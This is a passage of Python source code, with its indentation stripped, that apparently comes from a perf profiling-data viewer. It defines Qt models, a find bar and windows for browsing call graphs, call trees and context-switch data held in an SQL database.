if orientation != Qt.Horizontal:
return None
return self.columnHeader(section)
def index(self, row, column, parent):
return self.createIndex(row, column, self.child_items[row])
def DisplayData(self, item, index):
return item.getData(index.column())
def FetchIfNeeded(self, row):
if row > self.last_row_read:
self.last_row_read = row
if row + 10 >= self.child_count:
self.fetcher.Fetch(glb_chunk_sz)
def columnAlignment(self, column):
return Qt.AlignLeft
def columnFont(self, column):
return None
def data(self, index, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(index.column())
if role == Qt.FontRole:
return self.columnFont(index.column())
if role != Qt.DisplayRole:
return None
item = index.internalPointer()
return self.DisplayData(item, index)
# Model cache
model_cache = weakref.WeakValueDictionary()
model_cache_lock = threading.Lock()
def LookupCreateModel(model_name, create_fn):
model_cache_lock.acquire()
try:
model = model_cache[model_name]
except:
model = None
if model is None:
model = create_fn()
model_cache[model_name] = model
model_cache_lock.release()
return model
def LookupModel(model_name):
model_cache_lock.acquire()
try:
model = model_cache[model_name]
except:
model = None
model_cache_lock.release()
return model
# Find bar
class FindBar():
def __init__(self, parent, finder, is_reg_expr=False):
self.finder = finder
self.context = []
self.last_value = None
self.last_pattern = None
label = QLabel("Find:")
label.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.textbox = QComboBox()
self.textbox.setEditable(True)
self.textbox.currentIndexChanged.connect(self.ValueChanged)
self.progress = QProgressBar()
self.progress.setRange(0, 0)
self.progress.hide()
if is_reg_expr:
self.pattern = QCheckBox("Regular Expression")
else:
self.pattern = QCheckBox("Pattern")
self.pattern.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.next_button = QToolButton()
self.next_button.setIcon(parent.style().standardIcon(QStyle.SP_ArrowDown))
self.next_button.released.connect(lambda: self.NextPrev(1))
self.prev_button = QToolButton()
self.prev_button.setIcon(parent.style().standardIcon(QStyle.SP_ArrowUp))
self.prev_button.released.connect(lambda: self.NextPrev(-1))
self.close_button = QToolButton()
self.close_button.setIcon(parent.style().standardIcon(QStyle.SP_DockWidgetCloseButton))
self.close_button.released.connect(self.Deactivate)
self.hbox = QHBoxLayout()
self.hbox.setContentsMargins(0, 0, 0, 0)
self.hbox.addWidget(label)
self.hbox.addWidget(self.textbox)
self.hbox.addWidget(self.progress)
self.hbox.addWidget(self.pattern)
self.hbox.addWidget(self.next_button)
self.hbox.addWidget(self.prev_button)
self.hbox.addWidget(self.close_button)
self.bar = QWidget()
self.bar.setLayout(self.hbox)
self.bar.hide()
def Widget(self):
return self.bar
def Activate(self):
self.bar.show()
self.textbox.lineEdit().selectAll()
self.textbox.setFocus()
def Deactivate(self):
self.bar.hide()
def Busy(self):
self.textbox.setEnabled(False)
self.pattern.hide()
self.next_button.hide()
self.prev_button.hide()
self.progress.show()
def Idle(self):
self.textbox.setEnabled(True)
self.progress.hide()
self.pattern.show()
self.next_button.show()
self.prev_button.show()
def Find(self, direction):
value = self.textbox.currentText()
pattern = self.pattern.isChecked()
self.last_value = value
self.last_pattern = pattern
self.finder.Find(value, direction, pattern, self.context)
def ValueChanged(self):
value = self.textbox.currentText()
pattern = self.pattern.isChecked()
index = self.textbox.currentIndex()
data = self.textbox.itemData(index)
# Store the pattern in the combo box to keep it with the text value
if data == None:
self.textbox.setItemData(index, pattern)
else:
self.pattern.setChecked(data)
self.Find(0)
def NextPrev(self, direction):
value = self.textbox.currentText()
pattern = self.pattern.isChecked()
if value != self.last_value:
index = self.textbox.findText(value)
# Allow for a button press before the value has been added to the combo box
if index < 0:
index = self.textbox.count()
self.textbox.addItem(value, pattern)
self.textbox.setCurrentIndex(index)
return
else:
self.textbox.setItemData(index, pattern)
elif pattern != self.last_pattern:
# Keep the pattern recorded in the combo box up to date
index = self.textbox.currentIndex()
self.textbox.setItemData(index, pattern)
self.Find(direction)
def NotFound(self):
QMessageBox.information(self.bar, "Find", "'" + self.textbox.currentText() + "' not found")
# Context-sensitive call graph data model item base
class CallGraphLevelItemBase(object):
def __init__(self, glb, params, row, parent_item):
self.glb = glb
self.params = params
self.row = row
self.parent_item = parent_item
self.query_done = False
self.child_count = 0
self.child_items = []
if parent_item:
self.level = parent_item.level + 1
else:
self.level = 0
def getChildItem(self, row):
return self.child_items[row]
def getParentItem(self):
return self.parent_item
def getRow(self):
return self.row
def childCount(self):
if not self.query_done:
self.Select()
if not self.child_count:
return -1
return self.child_count
def hasChildren(self):
if not self.query_done:
return True
return self.child_count > 0
def getData(self, column):
return self.data[column]
# Context-sensitive call graph data model level 2+ item base
class CallGraphLevelTwoPlusItemBase(CallGraphLevelItemBase):
def __init__(self, glb, params, row, comm_id, thread_id, call_path_id, time, insn_cnt, cyc_cnt, branch_count, parent_item):
super(CallGraphLevelTwoPlusItemBase, self).__init__(glb, params, row, parent_item)
self.comm_id = comm_id
self.thread_id = thread_id
self.call_path_id = call_path_id
self.insn_cnt = insn_cnt
self.cyc_cnt = cyc_cnt
self.branch_count = branch_count
self.time = time
def Select(self):
self.query_done = True
query = QSqlQuery(self.glb.db)
if self.params.have_ipc:
ipc_str = ", SUM(insn_count), SUM(cyc_count)"
else:
ipc_str = ""
QueryExec(query, "SELECT call_path_id, name, short_name, COUNT(calls.id), SUM(return_time - call_time)" + ipc_str + ", SUM(branch_count)"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" INNER JOIN dsos ON symbols.dso_id = dsos.id"
" WHERE parent_call_path_id = " + str(self.call_path_id) +
" AND comm_id = " + str(self.comm_id) +
" AND thread_id = " + str(self.thread_id) +
" GROUP BY call_path_id, name, short_name"
" ORDER BY call_path_id")
while query.next():
if self.params.have_ipc:
insn_cnt = int(query.value(5))
cyc_cnt = int(query.value(6))
branch_count = int(query.value(7))
else:
insn_cnt = 0
cyc_cnt = 0
branch_count = int(query.value(5))
child_item = CallGraphLevelThreeItem(self.glb, self.params, self.child_count, self.comm_id, self.thread_id, query.value(0), query.value(1), query.value(2), query.value(3), int(query.value(4)), insn_cnt, cyc_cnt, branch_count, self)
self.child_items.append(child_item)
self.child_count += 1
# Context-sensitive call graph data model level three item
class CallGraphLevelThreeItem(CallGraphLevelTwoPlusItemBase):
def __init__(self, glb, params, row, comm_id, thread_id, call_path_id, name, dso, count, time, insn_cnt, cyc_cnt, branch_count, parent_item):
super(CallGraphLevelThreeItem, self).__init__(glb, params, row, comm_id, thread_id, call_path_id, time, insn_cnt, cyc_cnt, branch_count, parent_item)
dso = dsoname(dso)
if self.params.have_ipc:
insn_pcnt = PercentToOneDP(insn_cnt, parent_item.insn_cnt)
cyc_pcnt = PercentToOneDP(cyc_cnt, parent_item.cyc_cnt)
br_pcnt = PercentToOneDP(branch_count, parent_item.branch_count)
ipc = CalcIPC(cyc_cnt, insn_cnt)
self.data = [ name, dso, str(count), str(time), PercentToOneDP(time, parent_item.time), str(insn_cnt), insn_pcnt, str(cyc_cnt), cyc_pcnt, ipc, str(branch_count), br_pcnt ]
else:
self.data = [ name, dso, str(count), str(time), PercentToOneDP(time, parent_item.time), str(branch_count), PercentToOneDP(branch_count, parent_item.branch_count) ]
self.dbid = call_path_id
# Context-sensitive call graph data model level two item
class CallGraphLevelTwoItem(CallGraphLevelTwoPlusItemBase):
def __init__(self, glb, params, row, comm_id, thread_id, pid, tid, parent_item):
super(CallGraphLevelTwoItem, self).__init__(glb, params, row, comm_id, thread_id, 1, 0, 0, 0, 0, parent_item)
if self.params.have_ipc:
self.data = [str(pid) + ":" + str(tid), "", "", "", "", "", "", "", "", "", "", ""]
else:
self.data = [str(pid) + ":" + str(tid), "", "", "", "", "", ""]
self.dbid = thread_id
def Select(self):
super(CallGraphLevelTwoItem, self).Select()
for child_item in self.child_items:
self.time += child_item.time
self.insn_cnt += child_item.insn_cnt
self.cyc_cnt += child_item.cyc_cnt
self.branch_count += child_item.branch_count
for child_item in self.child_items:
child_item.data[4] = PercentToOneDP(child_item.time, self.time)
if self.params.have_ipc:
child_item.data[6] = PercentToOneDP(child_item.insn_cnt, self.insn_cnt)
child_item.data[8] = PercentToOneDP(child_item.cyc_cnt, self.cyc_cnt)
child_item.data[11] = PercentToOneDP(child_item.branch_count, self.branch_count)
else:
child_item.data[6] = PercentToOneDP(child_item.branch_count, self.branch_count)
# Context-sensitive call graph data model level one item
class CallGraphLevelOneItem(CallGraphLevelItemBase):
def __init__(self, glb, params, row, comm_id, comm, parent_item):
super(CallGraphLevelOneItem, self).__init__(glb, params, row, parent_item)
if self.params.have_ipc:
self.data = [comm, "", "", "", "", "", "", "", "", "", "", ""]
else:
self.data = [comm, "", "", "", "", "", ""]
self.dbid = comm_id
def Select(self):
self.query_done = True
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT thread_id, pid, tid"
" FROM comm_threads"
" INNER JOIN threads ON thread_id = threads.id"
" WHERE comm_id = " + str(self.dbid))
while query.next():
child_item = CallGraphLevelTwoItem(self.glb, self.params, self.child_count, self.dbid, query.value(0), query.value(1), query.value(2), self)
self.child_items.append(child_item)
self.child_count += 1
# Context-sensitive call graph data model root item
class CallGraphRootItem(CallGraphLevelItemBase):
def __init__(self, glb, params):
super(CallGraphRootItem, self).__init__(glb, params, 0, None)
self.dbid = 0
self.query_done = True
if_has_calls = ""
if IsSelectable(glb.db, "comms", columns = "has_calls"):
if_has_calls = " WHERE has_calls = " + glb.dbref.TRUE
query = QSqlQuery(glb.db)
QueryExec(query, "SELECT id, comm FROM comms" + if_has_calls)
while query.next():
if not query.value(0):
continue
child_item = CallGraphLevelOneItem(glb, params, self.child_count, query.value(0), query.value(1), self)
self.child_items.append(child_item)
self.child_count += 1
# Call graph model parameters
class CallGraphModelParams():
def __init__(self, glb, parent=None):
self.have_ipc = IsSelectable(glb.db, "calls", columns = "insn_count, cyc_count")
# Context-sensitive call graph data model base
class CallGraphModelBase(TreeModel):
def __init__(self, glb, parent=None):
super(CallGraphModelBase, self).__init__(glb, CallGraphModelParams(glb), parent)
def FindSelect(self, value, pattern, query):
if pattern:
# postgresql and sqlite pattern patching differences:
# postgresql LIKE is case sensitive but sqlite LIKE is not
# postgresql LIKE allows % and _ to be escaped with \ but sqlite LIKE does not
# postgresql supports ILIKE which is case insensitive
# sqlite supports GLOB (text only) which uses * and ? and is case sensitive
if not self.glb.dbref.is_sqlite3:
# Escape % and _
s = value.replace("%", "\%")
s = s.replace("_", "\_")
# Translate * and ? into SQL LIKE pattern characters % and _
trans = string.maketrans("*?", "%_")
match = " LIKE '" + str(s).translate(trans) + "'"
else:
match = " GLOB '" + str(value) + "'"
else:
match = " = '" + str(value) + "'"
self.DoFindSelect(query, match)
def Found(self, query, found):
if found:
return self.FindPath(query)
return []
def FindValue(self, value, pattern, query, last_value, last_pattern):
if last_value == value and pattern == last_pattern:
found = query.first()
else:
self.FindSelect(value, pattern, query)
found = query.next()
return self.Found(query, found)
def FindNext(self, query):
found = query.next()
if not found:
found = query.first()
return self.Found(query, found)
def FindPrev(self, query):
found = query.previous()
if not found:
found = query.last()
return self.Found(query, found)
def FindThread(self, c):
if c.direction == 0 or c.value != c.last_value or c.pattern != c.last_pattern:
ids = self.FindValue(c.value, c.pattern, c.query, c.last_value, c.last_pattern)
elif c.direction > 0:
ids = self.FindNext(c.query)
else:
ids = self.FindPrev(c.query)
return (True, ids)
def Find(self, value, direction, pattern, context, callback):
class Context():
def __init__(self, *x):
self.value, self.direction, self.pattern, self.query, self.last_value, self.last_pattern = x
def Update(self, *x):
self.value, self.direction, self.pattern, self.last_value, self.last_pattern = x + (self.value, self.pattern)
if len(context):
context[0].Update(value, direction, pattern)
else:
context.append(Context(value, direction, pattern, QSqlQuery(self.glb.db), None, None))
# Use a thread so the UI is not blocked during the SELECT
thread = Thread(self.FindThread, context[0])
thread.done.connect(lambda ids, t=thread, c=callback: self.FindDone(t, c, ids), Qt.QueuedConnection)
thread.start()
def FindDone(self, thread, callback, ids):
callback(ids)
# Context-sensitive call graph data model
class CallGraphModel(CallGraphModelBase):
def __init__(self, glb, parent=None):
super(CallGraphModel, self).__init__(glb, parent)
def GetRoot(self):
return CallGraphRootItem(self.glb, self.params)
def columnCount(self, parent=None):
if self.params.have_ipc:
return 12
else:
return 7
def columnHeader(self, column):
if self.params.have_ipc:
headers = ["Call Path", "Object", "Count ", "Time (ns) ", "Time (%) ", "Insn Cnt", "Insn Cnt (%)", "Cyc Cnt", "Cyc Cnt (%)", "IPC", "Branch Count ", "Branch Count (%) "]
else:
headers = ["Call Path", "Object", "Count ", "Time (ns) ", "Time (%) ", "Branch Count ", "Branch Count (%) "]
return headers[column]
def columnAlignment(self, column):
if self.params.have_ipc:
alignment = [ Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight ]
else:
alignment = [ Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight ]
return alignment[column]
def DoFindSelect(self, query, match):
QueryExec(query, "SELECT call_path_id, comm_id, thread_id"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" WHERE calls.id <> 0"
" AND symbols.name" + match +
" GROUP BY comm_id, thread_id, call_path_id"
" ORDER BY comm_id, thread_id, call_path_id")
def FindPath(self, query):
# Turn the query result into a list of ids that the tree view can walk
# to open the tree at the right place.
ids = []
parent_id = query.value(0)
while parent_id:
ids.insert(0, parent_id)
q2 = QSqlQuery(self.glb.db)
QueryExec(q2, "SELECT parent_id"
" FROM call_paths"
" WHERE id = " + str(parent_id))
if not q2.next():
break
parent_id = q2.value(0)
# The call path root is not used
if ids[0] == 1:
del ids[0]
ids.insert(0, query.value(2))
ids.insert(0, query.value(1))
return ids
# Call tree data model level 2+ item base
class CallTreeLevelTwoPlusItemBase(CallGraphLevelItemBase):
def __init__(self, glb, params, row, comm_id, thread_id, calls_id, call_time, time, insn_cnt, cyc_cnt, branch_count, parent_item):
super(CallTreeLevelTwoPlusItemBase, self).__init__(glb, params, row, parent_item)
self.comm_id = comm_id
self.thread_id = thread_id
self.calls_id = calls_id
self.call_time = call_time
self.time = time
self.insn_cnt = insn_cnt
self.cyc_cnt = cyc_cnt
self.branch_count = branch_count
def Select(self):
self.query_done = True
if self.calls_id == 0:
comm_thread = " AND comm_id = " + str(self.comm_id) + " AND thread_id = " + str(self.thread_id)
else:
comm_thread = ""
if self.params.have_ipc:
ipc_str = ", insn_count, cyc_count"
else:
ipc_str = ""
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT calls.id, name, short_name, call_time, return_time - call_time" + ipc_str + ", branch_count"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" INNER JOIN dsos ON symbols.dso_id = dsos.id"
" WHERE calls.parent_id = " + str(self.calls_id) + comm_thread +
" ORDER BY call_time, calls.id")
while query.next():
if self.params.have_ipc:
insn_cnt = int(query.value(5))
cyc_cnt = int(query.value(6))
branch_count = int(query.value(7))
else:
insn_cnt = 0
cyc_cnt = 0
branch_count = int(query.value(5))
child_item = CallTreeLevelThreeItem(self.glb, self.params, self.child_count, self.comm_id, self.thread_id, query.value(0), query.value(1), query.value(2), query.value(3), int(query.value(4)), insn_cnt, cyc_cnt, branch_count, self)
self.child_items.append(child_item)
self.child_count += 1
# Call tree data model level three item
class CallTreeLevelThreeItem(CallTreeLevelTwoPlusItemBase):
def __init__(self, glb, params, row, comm_id, thread_id, calls_id, name, dso, call_time, time, insn_cnt, cyc_cnt, branch_count, parent_item):
super(CallTreeLevelThreeItem, self).__init__(glb, params, row, comm_id, thread_id, calls_id, call_time, time, insn_cnt, cyc_cnt, branch_count, parent_item)
dso = dsoname(dso)
if self.params.have_ipc:
insn_pcnt = PercentToOneDP(insn_cnt, parent_item.insn_cnt)
cyc_pcnt = PercentToOneDP(cyc_cnt, parent_item.cyc_cnt)
br_pcnt = PercentToOneDP(branch_count, parent_item.branch_count)
ipc = CalcIPC(cyc_cnt, insn_cnt)
self.data = [ name, dso, str(call_time), str(time), PercentToOneDP(time, parent_item.time), str(insn_cnt), insn_pcnt, str(cyc_cnt), cyc_pcnt, ipc, str(branch_count), br_pcnt ]
else:
self.data = [ name, dso, str(call_time), str(time), PercentToOneDP(time, parent_item.time), str(branch_count), PercentToOneDP(branch_count, parent_item.branch_count) ]
self.dbid = calls_id
# Call tree data model level two item
class CallTreeLevelTwoItem(CallTreeLevelTwoPlusItemBase):
def __init__(self, glb, params, row, comm_id, thread_id, pid, tid, parent_item):
super(CallTreeLevelTwoItem, self).__init__(glb, params, row, comm_id, thread_id, 0, 0, 0, 0, 0, 0, parent_item)
if self.params.have_ipc:
self.data = [str(pid) + ":" + str(tid), "", "", "", "", "", "", "", "", "", "", ""]
else:
self.data = [str(pid) + ":" + str(tid), "", "", "", "", "", ""]
self.dbid = thread_id
def Select(self):
super(CallTreeLevelTwoItem, self).Select()
for child_item in self.child_items:
self.time += child_item.time
self.insn_cnt += child_item.insn_cnt
self.cyc_cnt += child_item.cyc_cnt
self.branch_count += child_item.branch_count
for child_item in self.child_items:
child_item.data[4] = PercentToOneDP(child_item.time, self.time)
if self.params.have_ipc:
child_item.data[6] = PercentToOneDP(child_item.insn_cnt, self.insn_cnt)
child_item.data[8] = PercentToOneDP(child_item.cyc_cnt, self.cyc_cnt)
child_item.data[11] = PercentToOneDP(child_item.branch_count, self.branch_count)
else:
child_item.data[6] = PercentToOneDP(child_item.branch_count, self.branch_count)
# Call tree data model level one item
class CallTreeLevelOneItem(CallGraphLevelItemBase):
def __init__(self, glb, params, row, comm_id, comm, parent_item):
super(CallTreeLevelOneItem, self).__init__(glb, params, row, parent_item)
if self.params.have_ipc:
self.data = [comm, "", "", "", "", "", "", "", "", "", "", ""]
else:
self.data = [comm, "", "", "", "", "", ""]
self.dbid = comm_id
def Select(self):
self.query_done = True
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT thread_id, pid, tid"
" FROM comm_threads"
" INNER JOIN threads ON thread_id = threads.id"
" WHERE comm_id = " + str(self.dbid))
while query.next():
child_item = CallTreeLevelTwoItem(self.glb, self.params, self.child_count, self.dbid, query.value(0), query.value(1), query.value(2), self)
self.child_items.append(child_item)
self.child_count += 1
# Call tree data model root item
class CallTreeRootItem(CallGraphLevelItemBase):
def __init__(self, glb, params):
super(CallTreeRootItem, self).__init__(glb, params, 0, None)
self.dbid = 0
self.query_done = True
if_has_calls = ""
if IsSelectable(glb.db, "comms", columns = "has_calls"):
if_has_calls = " WHERE has_calls = " + glb.dbref.TRUE
query = QSqlQuery(glb.db)
QueryExec(query, "SELECT id, comm FROM comms" + if_has_calls)
while query.next():
if not query.value(0):
continue
child_item = CallTreeLevelOneItem(glb, params, self.child_count, query.value(0), query.value(1), self)
self.child_items.append(child_item)
self.child_count += 1
# Call Tree data model
class CallTreeModel(CallGraphModelBase):
def __init__(self, glb, parent=None):
super(CallTreeModel, self).__init__(glb, parent)
def GetRoot(self):
return CallTreeRootItem(self.glb, self.params)
def columnCount(self, parent=None):
if self.params.have_ipc:
return 12
else:
return 7
def columnHeader(self, column):
if self.params.have_ipc:
headers = ["Call Path", "Object", "Call Time", "Time (ns) ", "Time (%) ", "Insn Cnt", "Insn Cnt (%)", "Cyc Cnt", "Cyc Cnt (%)", "IPC", "Branch Count ", "Branch Count (%) "]
else:
headers = ["Call Path", "Object", "Call Time", "Time (ns) ", "Time (%) ", "Branch Count ", "Branch Count (%) "]
return headers[column]
def columnAlignment(self, column):
if self.params.have_ipc:
alignment = [ Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight ]
else:
alignment = [ Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight ]
return alignment[column]
def DoFindSelect(self, query, match):
QueryExec(query, "SELECT calls.id, comm_id, thread_id"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" WHERE calls.id <> 0"
" AND symbols.name" + match +
" ORDER BY comm_id, thread_id, call_time, calls.id")
def FindPath(self, query):
# Turn the query result into a list of ids that the tree view can walk
# to open the tree at the right place.
ids = []
parent_id = query.value(0)
while parent_id:
ids.insert(0, parent_id)
q2 = QSqlQuery(self.glb.db)
QueryExec(q2, "SELECT parent_id"
" FROM calls"
" WHERE id = " + str(parent_id))
if not q2.next():
break
parent_id = q2.value(0)
ids.insert(0, query.value(2))
ids.insert(0, query.value(1))
return ids
# Vertical layout
class HBoxLayout(QHBoxLayout):
def __init__(self, *children):
super(HBoxLayout, self).__init__()
self.layout().setContentsMargins(0, 0, 0, 0)
for child in children:
if child.isWidgetType():
self.layout().addWidget(child)
else:
self.layout().addLayout(child)
# Horizontal layout
class VBoxLayout(QVBoxLayout):
def __init__(self, *children):
super(VBoxLayout, self).__init__()
self.layout().setContentsMargins(0, 0, 0, 0)
for child in children:
if child.isWidgetType():
self.layout().addWidget(child)
else:
self.layout().addLayout(child)
# Vertical layout widget
class VBox():
def __init__(self, *children):
self.vbox = QWidget()
self.vbox.setLayout(VBoxLayout(*children))
def Widget(self):
return self.vbox
# Tree window base
class TreeWindowBase(QMdiSubWindow):
def __init__(self, parent=None):
super(TreeWindowBase, self).__init__(parent)
self.model = None
self.find_bar = None
self.view = QTreeView()
self.view.setSelectionMode(QAbstractItemView.ContiguousSelection)
self.view.CopyCellsToClipboard = CopyTreeCellsToClipboard
self.context_menu = TreeContextMenu(self.view)
def DisplayFound(self, ids):
if not len(ids):
return False
parent = QModelIndex()
for dbid in ids:
found = False
n = self.model.rowCount(parent)
for row in xrange(n):
child = self.model.index(row, 0, parent)
if child.internalPointer().dbid == dbid:
found = True
self.view.setExpanded(parent, True)
self.view.setCurrentIndex(child)
parent = child
break
if not found:
break
return found
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.model.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, ids):
found = True
if not self.DisplayFound(ids):
found = False
self.find_bar.Idle()
if not found:
self.find_bar.NotFound()
# Context-sensitive call graph window
class CallGraphWindow(TreeWindowBase):
def __init__(self, glb, parent=None):
super(CallGraphWindow, self).__init__(parent)
self.model = LookupCreateModel("Context-Sensitive Call Graph", lambda x=glb: CallGraphModel(x))
self.view.setModel(self.model)
for c, w in ((0, 250), (1, 100), (2, 60), (3, 70), (4, 70), (5, 100)):
self.view.setColumnWidth(c, w)
self.find_bar = FindBar(self, self)
self.vbox = VBox(self.view, self.find_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, "Context-Sensitive Call Graph")
# Call tree window
class CallTreeWindow(TreeWindowBase):
def __init__(self, glb, parent=None, thread_at_time=None):
super(CallTreeWindow, self).__init__(parent)
self.model = LookupCreateModel("Call Tree", lambda x=glb: CallTreeModel(x))
self.view.setModel(self.model)
for c, w in ((0, 230), (1, 100), (2, 100), (3, 70), (4, 70), (5, 100)):
self.view.setColumnWidth(c, w)
self.find_bar = FindBar(self, self)
self.vbox = VBox(self.view, self.find_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, "Call Tree")
if thread_at_time:
self.DisplayThreadAtTime(*thread_at_time)
def DisplayThreadAtTime(self, comm_id, thread_id, time):
parent = QModelIndex()
for dbid in (comm_id, thread_id):
found = False
n = self.model.rowCount(parent)
for row in xrange(n):
child = self.model.index(row, 0, parent)
if child.internalPointer().dbid == dbid:
found = True
self.view.setExpanded(parent, True)
self.view.setCurrentIndex(child)
parent = child
break
if not found:
return
found = False
while True:
n = self.model.rowCount(parent)
if not n:
return
last_child = None
for row in xrange(n):
self.view.setExpanded(parent, True)
child = self.model.index(row, 0, parent)
child_call_time = child.internalPointer().call_time
if child_call_time < time:
last_child = child
elif child_call_time == time:
self.view.setCurrentIndex(child)
return
elif child_call_time > time:
break
if not last_child:
if not found:
child = self.model.index(0, 0, parent)
self.view.setExpanded(parent, True)
self.view.setCurrentIndex(child)
return
found = True
self.view.setExpanded(parent, True)
self.view.setCurrentIndex(last_child)
parent = last_child
# ExecComm() gets the comm_id of the command string that was set when the process exec'd i.e. the program name
def ExecComm(db, thread_id, time):
query = QSqlQuery(db)
QueryExec(query, "SELECT comm_threads.comm_id, comms.c_time, comms.exec_flag"
" FROM comm_threads"
" INNER JOIN comms ON comms.id = comm_threads.comm_id"
" WHERE comm_threads.thread_id = " + str(thread_id) +
" ORDER BY comms.c_time, comms.id")
first = None
last = None
while query.next():
if first is None:
first = query.value(0)
if query.value(2) and Decimal(query.value(1)) <= Decimal(time):
last = query.value(0)
if not(last is None):
return last
return first
# Container for (x, y) data
class XY():
def __init__(self, x=0, y=0):
self.x = x
self.y = y
def __str__(self):
return "XY({}, {})".format(str(self.x), str(self.y))
# Container for sub-range data
class Subrange():
def __init__(self, lo=0, hi=0):
self.lo = lo
self.hi = hi
def __str__(self):
return "Subrange({}, {})".format(str(self.lo), str(self.hi))
# Graph data region base class
class GraphDataRegion(object):
def __init__(self, key, title = "", ordinal = ""):
self.key = key
self.title = title
self.ordinal = ordinal
# Function to sort GraphDataRegion
def GraphDataRegionOrdinal(data_region):
return data_region.ordinal
# Attributes for a graph region
class GraphRegionAttribute():
def __init__(self, colour):
self.colour = colour
# Switch graph data region represents a task
class SwitchGraphDataRegion(GraphDataRegion):
def __init__(self, key, exec_comm_id, pid, tid, comm, thread_id, comm_id):
super(SwitchGraphDataRegion, self).__init__(key)
self.title = str(pid) + " / " + str(tid) + " " + comm
# Order graph legend within exec comm by pid / tid / time
self.ordinal = str(pid).rjust(16) + str(exec_comm_id).rjust(8) + str(tid).rjust(16)
self.exec_comm_id = exec_comm_id
self.pid = pid
self.tid = tid
self.comm = comm
self.thread_id = thread_id
self.comm_id = comm_id
# Graph data point
class GraphDataPoint():
def __init__(self, data, index, x, y, altx=None, alty=None, hregion=None, vregion=None):
self.data = data
self.index = index
self.x = x
self.y = y
self.altx = altx
self.alty = alty
self.hregion = hregion
self.vregion = vregion
# Graph data (single graph) base class
class GraphData(object):
def __init__(self, collection, xbase=Decimal(0), ybase=Decimal(0)):
self.collection = collection
self.points = []
self.xbase = xbase
self.ybase = ybase
self.title = ""
def AddPoint(self, x, y, altx=None, alty=None, hregion=None, vregion=None):
index = len(self.points)
x = float(Decimal(x) - self.xbase)
y = float(Decimal(y) - self.ybase)
self.points.append(GraphDataPoint(self, index, x, y, altx, alty, hregion, vregion))
def XToData(self, x):
return Decimal(x) + self.xbase
def YToData(self, y):
return Decimal(y) + self.ybase
# Switch graph data (for one CPU)
class SwitchGraphData(GraphData):
def __init__(self, db, collection, cpu, xbase):
super(SwitchGraphData, self).__init__(collection, xbase)
self.cpu = cpu
self.title = "CPU " + str(cpu)
self.SelectSwitches(db)
def SelectComms(self, db, thread_id, last_comm_id, start_time, end_time):
query = QSqlQuery(db)
QueryExec(query, "SELECT id, c_time"
" FROM comms"
" WHERE c_thread_id = " + str(thread_id) +
" AND exec_flag = " + self.collection.glb.dbref.TRUE +
" AND c_time >= " + str(start_time) +
" AND c_time <= " + str(end_time) +
" ORDER BY c_time, id")
while query.next():
comm_id = query.value(0)
if comm_id == last_comm_id:
continue
time = query.value(1)
hregion = self.HRegion(db, thread_id, comm_id, time)
self.AddPoint(time, 1000, None, None, hregion)
def SelectSwitches(self, db):
last_time = None
last_comm_id = None
last_thread_id = None
query = QSqlQuery(db)
QueryExec(query, "SELECT time, thread_out_id, thread_in_id, comm_out_id, comm_in_id, flags"
" FROM context_switches"
" WHERE machine_id = " + str(self.collection.machine_id) +
" AND cpu = " + str(self.cpu) +
" ORDER BY time, id")
while query.next():
flags = int(query.value(5))
if flags & 1:
# Schedule-out: detect and add exec's
if last_thread_id == query.value(1) and last_comm_id is not None and last_comm_id != query.value(3):
self.SelectComms(db, last_thread_id, last_comm_id, last_time, query.value(0))
continue
# Schedule-in: add data point
if len(self.points) == 0:
start_time = self.collection.glb.StartTime(self.collection.machine_id)
hregion = self.HRegion(db, query.value(1), query.value(3), start_time)
self.AddPoint(start_time, 1000, None, None, hregion)
time = query.value(0)
comm_id = query.value(4)
thread_id = query.value(2)
hregion = self.HRegion(db, thread_id, comm_id, time)
self.AddPoint(time, 1000, None, None, hregion)
last_time = time
last_comm_id = comm_id
last_thread_id = thread_id
def NewHRegion(self, db, key, thread_id, comm_id, time):
exec_comm_id = ExecComm(db, thread_id, time)
query = QSqlQuery(db)
QueryExec(query, "SELECT pid, tid FROM threads WHERE id = " + str(thread_id))
if query.next():
pid = query.value(0)
tid = query.value(1)
else:
pid = -1
tid = -1
query = QSqlQuery(db)
QueryExec(query, "SELECT comm FROM comms WHERE id = " + str(comm_id))
if query.next():
comm = query.value(0)
else:
comm = ""
return SwitchGraphDataRegion(key, exec_comm_id, pid, tid, comm, thread_id, comm_id)
def HRegion(self, db, thread_id, comm_id, time):
key = str(thread_id) + ":" + str(comm_id)
hregion = self.collection.LookupHRegion(key)
if hregion is None:
hregion = self.NewHRegion(db, key, thread_id, comm_id, time)
self.collection.AddHRegion(key, hregion)
return hregion
# Graph data collection (multiple related graphs) base class
class GraphDataCollection(object):
def __init__(self, glb):
self.glb = glb
self.data = []
self.hregions = {}
self.xrangelo = None
self.xrangehi = None
